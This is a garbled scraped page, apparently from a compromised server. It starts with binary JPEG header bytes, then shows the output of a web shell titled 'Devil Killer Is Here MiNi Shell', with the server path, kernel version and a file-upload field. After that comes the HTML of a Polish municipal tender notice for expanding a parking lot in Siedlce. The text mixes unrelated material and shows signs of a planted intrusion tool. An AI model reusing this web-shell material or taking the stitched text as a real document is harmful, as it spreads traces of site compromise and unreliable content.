JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210915/0018184701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa parkingu na ulicy Romanówka w Siedlcach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA - MIASTO SIEDLCE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711581765</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Skwer Niepodległości 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siedlce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rzp@um.siedlce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.siedlce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa parkingu na ulicy Romanówka w Siedlcach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-202a4857-161c-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00181847</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miasto-siedlce.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miasto-siedlce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie<br/>Zakupowej tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7,<br/>Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji<br/>w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>2. Informacje dotyczące odpowiedniego przygotowania stanowiska dostępne są na stronie<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki<br/>3. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików<br/>o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif,<br/>tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html,<br/>xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>4. Wymagania dotyczące dokumentów elektronicznych wynikające z § 10 rozporządzenia Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452):<br/>1) muszą być utrwalone w sposób umożliwiający ich wielokrotne odczytanie, zapisanie i powielenie, a<br/>także przekazanie przy użyciu środków komunikacji elektronicznej lub na informatycznym nośniku<br/>danych;<br/>2) muszą umożliwiać prezentację treści w postaci elektronicznej, w szczególności przez wyświetlenie tej treści na monitorze ekranowym;<br/>3) muszą umożliwiać prezentację treści w postaci papierowej, w szczególności za pomocą wydruku;<br/>4) muszą zawierać dane w układzie niepozostawiającym wątpliwości co do treści i kontekstu<br/>zapisanych informacji.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie,<br/>jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po<br/>odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>2) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.<br/>6. W przypadku wnoszenia wadium w formie poręczenia lub gwarancji, oryginał dokumentu wadium<br/>(poręczenia lub gwarancji) opatrzonego podpisem elektronicznym osób upoważnionych do jego<br/>wystawienia, Wykonawca składa załączając na Platformie w zakładce „OFERTY” – poprzez wybranie<br/>polecenia „dodaj dokument".<br/>7. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf<br/>8. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>rozszerzeń:<br/>1) .zip<br/>2) .7Z<br/>9. W przypadku stosowania przez wykonawcę kwalifikowanego podpisu elektronicznego:<br/>1) ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu<br/>zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>rozszerzenie .pdf i opatrzenie ich podpisem kwalifikowanym w formacie PAdES.<br/>2) pliki w innych formatach niż PDF zaleca się opatrzyć podpisem w formacie XAdES o typie<br/>zewnętrznym. W związku z tym Wykonawca będzie zobowiązany załączyć oprócz podpisanego<br/>dokumentu oddzielny plik z podpisem.<br/>Szczegółowe wymagania techniczne i organizacyjne określone zostały w Rozdziale 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z Rozdziałem 27 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem 27 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">F.271.31.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zadanie pn. „Rozbudowa parkingu na ulicy Romanówka w Siedlcach”.<br/>1)	Zakres zamówienia obejmuje przebudowę instalacji oświetlenia ulicy Romanówka na odcinku od skrzyżowania z ulicą Unitów Podlaskich do skrzyżowania z ulicą Żeglarską oraz Rozbudowa parkingu na ulicy Romanówka – Etap 1.<br/>Zakres robót:<br/>a) pomiary wraz z geodezyjną inwentaryzacją powykonawczą;<br/>b) demontaż istniejących słupów oświetleniowych;<br/>c) demontaż instalacji kablowej;<br/>d) układanie instalacji, kabli nN 0,4 kV wraz z bednarką;<br/>e) montaż instalacji oświetleniowych;<br/>f) montaż szaf podziału sieci;<br/>g) wycięcie drzew kolidujących z inwestycją;<br/>h) rozbiórka istniejących krawężników, obrzeży i chodników;<br/>i) rozbiórka istniejącej nawierzchni asfaltowej;<br/>j) rozbiórka istniejącej podbudowy betonowej;<br/>k) wykonanie robót ziemnych;<br/>l) ustawienie krawężników betonowych na ławie betonowej z oporem;<br/>m)	ustawienie obrzeży betonowych szarych 25x8cm, na ławie betonowej z oporem;<br/>n) wykonanie podbudowy pod nawierzchnię parkingu z chudego betonu cementowego Rm= 5 MPa, o gr. 20cm po zagęszczeniu mechanicznym;<br/>o) wykonanie podbudowy pod chodnik z chudego betonu cementowego Rm=6÷9MPa, o gr. 12cm po zagęszczeniu mechanicznym;<br/>p) wykonanie warstwy ścieralnej z betonu asfaltowego AC 11 S 50/70 KR1-2 lub z recyklera - grubość warstwy 5 cm<br/>q) wykonanie chodnika z kostki brukowej betonowej szarej, o grubości 8cm, <br/>na podsypce cementowo-piaskowej 1:4 o grubości 3cm, ze spoinowaniem piaskiem;<br/>r) regulacja obudów zaworów wodociągowych i gazowych, kratek ściekowych, włazów studzienek rewizyjnych i studzienek telefonicznych;<br/>s) wykonanie oznakowania poziomego i pionowego;<br/>t) wykonanie nasadzeń zastępczych;<br/>2)	Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa <br/>i Szczegółowa Specyfikacja Techniczna, przedmiar robót stanowi materiał pomocniczy, dodatkowy (załącznik nr 5 do SWZ).<br/>3)	Roboty należy realizować zgodnie ze sztuką budowlaną, Szczegółową Specyfikacją Techniczną, warunkami Bezpieczeństwa i Ochrony Zdrowia oraz zgodnie z projektami budowlanymi i warunkami technicznymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233100-0 - Roboty w zakresie budowy autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia dotychczasowemu Wykonawcy robót budowlanych zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego, tj. przebudowy instalacji oświetlenia ulicy Romanówka na odcinku od skrzyżowania z ulicą Garwolińską do skrzyżowania z ulicą Niepodległości oraz Rozbudowa parkingu na ulicy Romanówka – Etap 2.<br/>Zakres robót:<br/>a)	pomiary wraz z geodezyjną inwentaryzacją powykonawczą;<br/>b)	demontaż istniejących słupów oświetleniowych;<br/>c)	demontaż instalacji kablowej;<br/>d)	układanie instalacji, kabli nN 0,4 kV wraz z bednarką;<br/>e)	montaż instalacji oświetleniowych;<br/>f)	rozbiórka istniejących krawężników, obrzeży i chodników;<br/>g)	rozbiórka istniejącej nawierzchni asfaltowej;<br/>h)	rozbiórka istniejącej podbudowy betonowej;<br/>i)	wykonanie robót ziemnych;<br/>j)	ustawienie krawężników betonowych na ławie betonowej z oporem;<br/>k)	ustawienie obrzeży betonowych szarych 25x8cm, na ławie betonowej <br/>z oporem;<br/>l) wykonanie podbudowy pod nawierzchnię parkingu z chudego betonu cementowego Rm= 5 MPa, o gr. 20cm po zagęszczeniu mechanicznym;<br/>m)	wykonanie podbudowy pod chodnik z chudego betonu cementowego Rm=6÷9MPa, o gr. 12cm po zagęszczeniu mechanicznym;<br/>n)	wykonanie warstwy ścieralnej z betonu asfaltowego AC 11 S 50/70 KR1-2 lub z recyklera - grubość warstwy 5 cm<br/>o)	wykonanie chodnika z kostki brukowej betonowej szarej, o grubości 8cm, <br/>na podsypce cementowo-piaskowej 1:4 o grubości 3cm, ze spoinowaniem piaskiem;<br/>p) regulacja obudów zaworów wodociągowych i gazowych, kratek ściekowych, włazów studzienek rewizyjnych i studzienek telefonicznych;<br/>q)	wykonanie oznakowania poziomego i pionowego;</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert, zgodnie z<br/>Rozdziałem 22 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na<br/>zasadach określonych w Rozdziale 8 SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że posiada środki finansowe<br/>lub zdolność kredytową w wysokości nie mniejszej niż<br/>140 000,00 zł w okresie nie wcześniejszym niż 3 miesiące przed upływem terminu składania<br/>ofert.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie<br/>co najmniej jedną robotę budowlaną obejmującą branżę drogową o wartości nie mniejszej niż<br/>140 000,00 zł brutto;<br/>b) dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia,<br/>w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi, posiadającymi<br/>kwalifikacje zawodowe, uprawnienia, doświadczenie<br/>i wykształcenie, niezbędne do wykonania zamówienia, tj.<br/>osobą mającą pełnić funkcję kierownika budowy, posiadającą doświadczenie na zrealizowanym<br/>przez siebie jako kierownik budowy minimum jednym zadaniu polegającym na<br/>budowie/przebudowie drogi publicznej w rozumieniu ustawy<br/>z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2020r. poz. 1333 ze zm.)<br/>o wartości robót co najmniej 140 000,00 zł brutto.<br/>Informacje dodatkowe:<br/>1) W zakresie dysponowania osobami skierowanymi przez Wykonawcę do realizacji zamówienia<br/>publicznego, Zamawiający uznaje wymagane uprawnienia określone w ustawie z dnia 7 lipca<br/>1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333 z późn. zm.) oraz uprawnienia wydane<br/>na podstawie wcześniej obowiązujących przepisów prawnych lub odpowiadające im uprawnienia<br/>budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego<br/>oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo<br/>Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz.U. z 2020 r. poz. 220 z późn. zm.),<br/>2) Ilekroć w treści SWZ jest mowa o „uprawnieniach budowlanych”, „budowie”, „przebudowie”,<br/>„kierowniku budowy”, „kierowniku robót” należy pojęcia te rozumieć zgodnie z definicjami<br/>określonymi w ustawie z dnia 7 lipca 1994 r Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze<br/>zm.) oraz aktami wykonawczymi do niej.<br/>3) Klasy dróg określone są w rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 2<br/>marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i<br/>ich usytuowanie (Dz. U. z 2016 r. poz. 124).<br/>4) W przypadku gdy jakakolwiek wartość dotycząca powyższych warunków wyrażona będzie w<br/>walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego<br/>Banku Polskiego (dalej: NBP) dla danej waluty z dnia, w którym nastąpi publikacja<br/>przedmiotowego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP,<br/>Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/>3. Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części może<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych. Wymagania dotyczące polegania na zasobach innych<br/>podmiotów opisane są w Rozdziale 12 SWZ.<br/>4. Zamawiający w stosunku do Wykonawców wspólnie ubiegających się o udzielnie zamówienia<br/>dopuszcza łączne spełnianie warunków przez Wykonawców. Wymagania dotyczące<br/>Wykonawców wspólnie ubiegających się o udzielnie zamówienia opisane są w Rozdziale 13<br/>SWZ.<br/>5. Oceniając zdolność techniczną lub zawodową, Zamawiający działając na podstawie art. 116<br/>ust. 2 ustawy Pzp może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu<br/>o udzielenie zamówienia Wykonawca składa:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji z<br/>zastrzeżeniem ust.2;<br/>2. Zamawiający nie będzie wzywał do złożenia podmiotowych środków 